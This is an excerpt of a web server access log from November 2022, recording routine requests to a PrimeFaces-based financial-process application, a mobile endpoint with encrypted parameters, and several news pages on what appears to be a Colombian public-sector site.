201.245.192.253 - - [02/Nov/2022:07:52:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 46101
201.245.192.253 - - [02/Nov/2022:07:52:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:52:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:52:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:52:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:52:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 39521
201.245.192.253 - - [02/Nov/2022:07:52:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 39521
186.102.31.23 - - [02/Nov/2022:07:52:53 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX180lWF1r/u+1AXnkFJ1KNoBhdLPdByrhzrEeXJQehgvfTltu9i72Yu4rVs6H9NKMGS9qPa5bpPoYNy90QENdyRs6i9HW+etX15rN9V1QmGTGmR55v6P/LQG/Bg36QRHVH0HvztKbhFlc67UibH0ChUr02l6VcQ1Rksd/CwW+wEREQUFl8uquc53wBXfJFbLLkVkz6gtRKMTsVjD2gUa0yGUk2UxJEojuyFc3RDAp8DLb+z2zGSTXM8M&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
201.245.192.253 - - [02/Nov/2022:07:52:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12905
173.252.107.17 - - [02/Nov/2022:07:52:58 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
201.245.192.253 - - [02/Nov/2022:07:52:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 120896
201.245.192.253 - - [02/Nov/2022:07:53:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:00 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
186.102.31.23 - - [02/Nov/2022:07:53:01 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/1kPGtMDxdvgr7og+rpiuDQXjMXh0Ks/pVn+k1LWBhoaxV0VaoaB6OU6a9J07r0Hj9DfLVwl8jQWmx1xFB3O/aui3hk9eIDy7pvxu7ObcTSLG230oryU4RKSGVho2wSC6nE/ZWeRUYug==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
69.63.184.2 - - [02/Nov/2022:07:53:11 -0500] "GET /mas-de-30-tinguas-fueron-liberadas-en-la-semana-de-los-humedales.html HTTP/1.1" 206 950
186.102.31.23 - - [02/Nov/2022:07:53:13 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18VCNfTZfx7Bg3IoUtiaKGo04TilWKoZKzGyUgeRPj+biqvQRHjNj9Aqr9ac673+vIHGWUZOrw+234eaQspO5YuQZ2YUKslZaN2RbYtG6m6jGPPg0EHAPyyBJr6JOI2sgiHFmsgCWgE9w==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
172.22.2.4 - - [02/Nov/2022:07:51:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 49223
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 42643
186.102.31.23 - - [02/Nov/2022:07:53:25 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18l7BHcjpHMUUbLSX9qbcN0papO6zi7agDiSyEyjJ+w3feMI94Z3OEvmGrfv84rz1BzUEQfCID5wlONLEZyoGsYHCA6ZodtvHYyN8xUI2dFxosB24KDz6DAQkNjCXe9QgHtR+utNdKdJg==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 42643
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 42643
201.245.192.253 - - [02/Nov/2022:07:53:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 42643
216.245.221.92 - - [02/Nov/2022:07:53:35 -0500] "HEAD / HTTP/1.1" 200 -
186.102.31.23 - - [02/Nov/2022:07:53:38 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18e7kJXX48AGlfJhfVuQy26q0+xGvctxe/ij8cWMWQ1k9jU7756PHJBlI15+CL9FHkmVaNH9UtL63dUxgn4CMnFXhz9VInoYtmM7Q3pG7R/gg8Dae4Mcr2f5KPuemmO4qWOslIb145kVA==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
201.245.192.253 - - [02/Nov/2022:07:53:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12880
201.245.192.253 - - [02/Nov/2022:07:53:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 114525
201.245.192.253 - - [02/Nov/2022:07:53:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:53:43 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
